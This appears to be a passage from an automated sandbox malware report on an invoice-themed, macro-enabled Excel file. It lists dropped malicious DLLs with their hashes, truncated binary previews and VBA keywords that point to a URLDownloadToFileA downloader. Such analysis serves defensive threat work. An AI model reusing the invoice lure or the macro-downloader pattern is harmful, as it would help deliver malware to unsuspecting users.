                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628843593684541
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:4746FBED409F87EC6DDB6653CB4E201C
                                                                                                SHA1:B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
                                                                                                SHA-256:864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
                                                                                                SHA-512:E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
                                                                                                Malicious:true
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628853255480928
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:LIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqmq:ERKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:B613AB3EEF642E50999219C6BC103C24
                                                                                                SHA1:D2DF29F7ACFC78B500217AF07BC69B558E08D12E
                                                                                                SHA-256:4BFDDDE9F8B6C92A2436385CEDF3F5ACF3A3284A22F40390A503DECAD56EECF9
                                                                                                SHA-512:DC8B8909964B85799DA724B38A1D6A8EC96B64B3A8BB359B1647AF6B009A363A7343DDA93C44AF362D3476939A731FE7A333E07CB329D41E4E4095CB8D0B3527
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L.....]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628843593684541
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:4746FBED409F87EC6DDB6653CB4E201C
                                                                                                SHA1:B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
                                                                                                SHA-256:864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
                                                                                                SHA-512:E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
                                                                                                Malicious:true
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1_Total New Invoices-Thursday January 21_2021.LNK
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Thu Jan 21 23:03:04 2021, atime=Thu Jan 21 23:03:08 2021, length=51781, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2388
                                                                                                Entropy (8bit):4.58939303919126
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8E/XT0jFzSit6C7dqYitM+Qh2E/XT0jFzSit6C7dqYitM+Q/:8E/XojFzSetdFeM+Qh2E/XojFzSetdF3
                                                                                                MD5:FEFCBF36C1DFE519C45CFEDA4FC5AC99
                                                                                                SHA1:D238FB9334AC8B45E0EA60B70D7FA955F8E8621B
                                                                                                SHA-256:0AFB82F1D6FC4307FB3A61F4C04FD5601E393E317E3AFB6B7DF0E8375E6F47EC
                                                                                                SHA-512:6074C94D6DCC4B345FAE85F178370042DC068B7281274A94366BB41B6D12A092736969AC7B7F57B1DF2E15B3EB328938865FDC9BFB533EC0E18438625C91ABB7
                                                                                                Malicious:false
                                                                                                Preview: L..................F.... .....l..{..p...Q.....:.Q...E............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2....6RT. .1_TOTA~1.XLS..........Q.y.Q.y*...8.....................1._.T.o.t.a.l. .N.e.w. .I.n.v.o.i.c.e.s.-.T.h.u.r.s.d.a.y. .J.a.n.u.a.r.y. .2.1._.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\1_Total New Invoices-Thursday January 21_2021.xlsm.I.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1._.T.o.t.a.l. .N.e.w. .I.n.v.o.i.c.e.s.-.T.h.u.r.s.d.a.y. .J.a.n.u.a.r.y. .2.1._.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.
                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Jan 21 23:03:04 2021, atime=Thu Jan 21 23:03:04 2021, length=8192, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):867
                                                                                                Entropy (8bit):4.459646821678823
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:85Q7QXfVCLgXg/XAlCPCHaXtB8XzB/IGUX+Wnicvb7jLbDtZ3YilMMEpxRljK8Cs:85zU/XTd6jcYefbDv3q+rNru/
                                                                                                MD5:AEE70929E31AB37A254C87326A7D0D3E
                                                                                                SHA1:41D2F56B766B0A2BAA1F561F20FE4494CD70C389
                                                                                                SHA-256:E6B5213E4AF12E194107E0EFCA3863000D013FA579A65F119D22AE35E322A796
                                                                                                SHA-512:D4C430AEA2E8C46AF9EBC2D08C9B2B025E693277EF2D3F397B0234FCD6942A8AF8416B0D0110CA0FB44819FD13CCE86A77B8FC88F4F5C11DDCA614FEAA201A06
                                                                                                Malicious:false
                                                                                                Preview: L..................F...........7G..p...Q...p...Q.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....6Rc...Desktop.d......QK.X6Rc.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):190
                                                                                                Entropy (8bit):5.035278798464317
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:oyBVomxWSdFoHJUTRMFbsp6lhFoHJUTRMFbsp6lmxWSdFoHJUTRMFbsp6lv:djBFoHJqMDrFoHJqMDUFoHJqMD1
                                                                                                MD5:A187ABF37658D31C9E15AC193D5FAF74
                                                                                                SHA1:8C6073CAD73B282337A4A21B4D44F253A32BD1A4
                                                                                                SHA-256:0C441D01B50C425D018E61E0DB13312E80330A56E3EB05B864C1515A775EF088
                                                                                                SHA-512:7113994CF9AF9316400829AD07DA6C25BDF915F8335942C15A09E77DC4737CE400D416B3084BC04D5DF080150FA5CB8663D14C4C3CC7350929BDBD6A0A4BD38E
                                                                                                Malicious:false
                                                                                                Preview: Desktop.LNK=0..[misc]..1_Total New Invoices-Thursday January 21_2021.LNK=0..1_Total New Invoices-Thursday January 21_2021.LNK=0..[misc]..1_Total New Invoices-Thursday January 21_2021.LNK=0..
                                                                                                C:\Users\user\Desktop\863F0000
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):51781
                                                                                                Entropy (8bit):7.800567178657162
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:X/Tu5G0cSBNdXT5H5W3FPbNmoWTXZJ8E5xc0/SWNFXqcjWC9:X/Tu5zcS1R0PmoWTXZJBzN/XNqcJ9
                                                                                                MD5:6C7B9B542ACB8B0B8AAFE9E97493588C
                                                                                                SHA1:9979EEB156ED95B8006470CABB2561A8DC9306A7
                                                                                                SHA-256:ED7BE241973548AF186EA6D353EFE5A01C9F2631AF0BDB117C2259A282E70A4C
                                                                                                SHA-512:79FA3D7FC76D9F1A87D6C471FECAE7496BAF33BA09FC3D899BDBA55A5E2AAB8E7C383B6F1930EFADFE453FCDA7531F1C809B04126C987F44BDDA7B9867BE08B7
                                                                                                Malicious:false
                                                                                                Preview: .VKo.0..W..@.V.M*UU.l.Mzl#%.z.....K.C...1l6..F........a}.*.4.0:'..$..)..r...K..$>0]0i4.d..\m.Y..-.......~.......q.4N..........^.V.(7:..i..d....=..8.;..M...{Q*'.Z)8.h.6.8.IMY.......3o.....A..:....B..<...VW'.BE.q~....D.i\..8...4...s.!......w.....2..q\3...9..{..Gc..T9Q@r.\...n!m%}4n.5f.M..j..r.Y...b....p...........i7\,.|F........L..#.B..gD./|..O>.."......NEG3..>.%.W..'.S.....`..^..K...E..{z......ft......0.#........Tb.A.!1Q..-.u.'.-!~..qcCDb..:X~6.ZOD........3Ty.......q..................PK..........!...U.............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsm
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):330
                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                Malicious:true
                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:Microsoft Excel 2007+
                                                                                                Entropy (8bit):7.638654402267145
                                                                                                TrID:
                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                File name:1_Total New Invoices-Thursday January 21_2021.xlsm
                                                                                                File size:34299
                                                                                                MD5:a52a88ae97dd408d38d98c9aa7f81142
                                                                                                SHA1:234b65bc42a077c98c61a8eb4870d41e0039013e
                                                                                                SHA256:c7e6848fd63681514d6dad3032e358a257dde3aa1cd3b349306283356bca2608
                                                                                                SHA512:5e613f1db0e10dbdb14bc3b0f8ef7816f27a5de9f8fbb63c698e18695d0f6c7872c1e958aa122342b0cdd8d0dea70f1b23dae85ef9ae6ef893b69d30d903feab
                                                                                                SSDEEP:384:h70vIUlM9z5B0QxAN57zJb3ke5QNt5Eil1LyGAEGibf8FMFHvVUkPnGq/g4jueSL:WQxENxzJb3e5bJ1bf8FmHvV3/Gq/g9ZL
                                                                                                File Content Preview:PK..........!...?.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                File Icon

                                                                                                Icon Hash:e4e2aa8aa4bcbcac

                                                                                                Static OLE Info

                                                                                                General

                                                                                                Document Type:OpenXML
                                                                                                Number of OLE Files:2

                                                                                                OLE File "/opt/package/joesandbox/database/analysis/342716/sample/1_Total New Invoices-Thursday January 21_2021.xlsm"

                                                                                                Indicators

                                                                                                Has Summary Info:False
                                                                                                Application Name:unknown
                                                                                                Encrypted Document:False
                                                                                                Contains Word Document Stream:
                                                                                                Contains Workbook/Book Stream:
                                                                                                Contains PowerPoint Document Stream:
                                                                                                Contains Visio Document Stream:
                                                                                                Contains ObjectPool Stream:
                                                                                                Flash Objects Count:
                                                                                                Contains VBA Macros:True

                                                                                                Summary

                                                                                                Subject:by C.H. Robinson
                                                                                                Author:
                                                                                                Last Saved By:
                                                                                                Create Time:2021-01-21T13:13:53Z
                                                                                                Last Saved Time:2021-01-21T13:20:42Z
                                                                                                Security:0

                                                                                                Document Summary

                                                                                                Thumbnail Scaling Desired:false
                                                                                                Company:
                                                                                                Contains Dirty Links:false
                                                                                                Shared Document:false
                                                                                                Changed Hyperlinks:false
                                                                                                Application Version:16.0300

                                                                                                Streams with VBA

                                                                                                VBA File Name: Module1.bas, Stream Size: 5129
                                                                                                General
                                                                                                Stream Path:VBA/Module1
                                                                                                VBA File Name:Module1.bas
                                                                                                Stream Size:5129
                                                                                                Data ASCII:. . . . . $ . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . 2 . . . . . . . . . . . . . . . . . . 4 . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . U R L D o w n l o a d T o F i l e A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 03 24 01 00 00 56 07 00 00 08 01 00 00 e4 01 00 00 ff ff ff ff 84 07 00 00 c8 0f 00 00 00 00 00 00 01 00 00 00 23 f3 ee 32 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 34 00 00 00 00 00 46 02 20 00 20 00 ff ff 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 00 00 ff ff ff ff 01 00 00 00 ff

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                #Else
                                                                                                (GAs_Y
                                                                                                n_page_A(s,
                                                                                                LongPtr
                                                                                                "urlmon"
                                                                                                Resume
                                                                                                Sheets(ol).Cells(timeAndDate,
                                                                                                Randomize:
                                                                                                fillename
                                                                                                Long,
                                                                                                "MegaA_"
                                                                                                PtrSafe
                                                                                                Declare
                                                                                                Next:
                                                                                                dwReserved
                                                                                                Rnd))
                                                                                                UBound(x_p_cl)
                                                                                                "sp")
                                                                                                String,
                                                                                                "sp":
                                                                                                pCaller
                                                                                                x_p_cl
                                                                                                String
                                                                                                Sheets(s).UsedRange.SpecialCells(xlCellTypeConstants):
                                                                                                Split(govs,
                                                                                                "="):
                                                                                                SReport(timeAndDate)):
                                                                                                directoo
                                                                                                LongPtr,
                                                                                                x_p_cl(a):
                                                                                                Sheets(ol).Cells(aa,
                                                                                                timeAndDate
                                                                                                SReport
                                                                                                Integer:
                                                                                                ByVal
                                                                                                n_page_A
                                                                                                Integer)
                                                                                                Split(kij(ol),
                                                                                                Split(StrConv(m,
                                                                                                LBound(x_p_cl)
                                                                                                "URLDownloadToFileA"
                                                                                                ol).Name
                                                                                                Variant)
                                                                                                nimo(Int((UBound(nimo)
                                                                                                GAs_Y
                                                                                                Error
                                                                                                Attribute
                                                                                                ol).value
                                                                                                szURL
                                                                                                SReport(yel
                                                                                                help_with
                                                                                                help_with()
                                                                                                VB_Name
                                                                                                fillename,
                                                                                                Function
                                                                                                szFileName
                                                                                                lpfnCB
                                                                                                timeAndDate()
                                                                                                Alias
                                                                                                Print_Sheet_MAin()
                                                                                                GAs_Y()
                                                                                                SReport(Oa))),
                                                                                                Private
                                                                                                VBA Code
                                                                                                VBA File Name: Sheet1.cls, Stream Size: 1525
                                                                                                General
                                                                                                Stream Path:VBA/Sheet1
                                                                                                VBA File Name:Sheet1.cls
                                                                                                Stream Size:1525
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . * . W o r l d _ t i m e _ P r i n t , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 1e 01 00 00 d0 03 00 00 02 01 00 00 2e 02 00 00 ff ff ff ff d7 03 00 00 b3 04 00 00 00 00 00 00 01 00 00 00 23 f3 00 d5 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                Index
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                VB_Exposed
                                                                                                Long)
                                                                                                VB_Customizable
                                                                                                Print_Sheet_MAin
                                                                                                World_time_Print_Layout(ByVal
                                                                                                VB_Control
                                                                                                "World_time_Print,
                                                                                                MultiPage"
                                                                                                Sheet_Print()
                                                                                                VB_TemplateDerived
                                                                                                MSForms,
                                                                                                False
                                                                                                Attribute
                                                                                                Private
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VBA Code
                                                                                                VBA File Name: Sheet2.cls, Stream Size: 991
                                                                                                General
                                                                                                Stream Path:VBA/Sheet2
                                                                                                VBA File Name:Sheet2.cls
                                                                                                Stream Size:991
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . . ^ . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 9d 5e 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                False
                                                                                                VB_Exposed
                                                                                                Attribute
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VB_Customizable
                                                                                                VB_TemplateDerived
                                                                                                VBA Code
                                                                                                VBA File Name: Sheet3.cls, Stream Size: 991
                                                                                                General
                                                                                                Stream Path:VBA/Sheet3
                                                                                                VBA File Name:Sheet3.cls
                                                                                                Stream Size:991
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . } . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 7d 9f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                False
                                                                                                VB_Exposed
                                                                                                Attribute
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VB_Customizable
                                                                                                VB_TemplateDerived
                                                                                                VBA Code
                                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                General
                                                                                                Stream Path:VBA/ThisWorkbook
                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                Stream Size:999
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . . r . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 c9 72 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                False
                                                                                                VB_Exposed
                                                                                                Attribute
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                "ThisWorkbook"
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VB_Customizable
                                                                                                VB_TemplateDerived
                                                                                                VBA Code

                                                                                                Streams

                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 664
                                                                                                General
                                                                                                Stream Path:PROJECT
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Stream Size:664
                                                                                                Entropy:5.2164189289
                                                                                                Base64 Encoded:True
                                                                                                Data ASCII:I D = " { 3 8 C 1 2 A 0 A - E 6 4 8 - 4 6 4 5 - A 7 B 8 - E 4 4 A B D C 4 2 5 E 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D
                                                                                                Data Raw:49 44 3d 22 7b 33 38 43 31 32 41 30 41 2d 45 36 34 38 2d 34 36 34 35 2d 41 37 42 38 2d 45 34 34 41 42 44 43 34 32 35 45 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 128
                                                                                                General
                                                                                                Stream Path:PROJECTwm
                                                                                                File Type:data
                                                                                                Stream Size:128
                                                                                                Entropy:3.22588715598
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4043
                                                                                                General
                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                File Type:data
                                                                                                Stream Size:4043
                                                                                                Entropy:4.60204133276
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
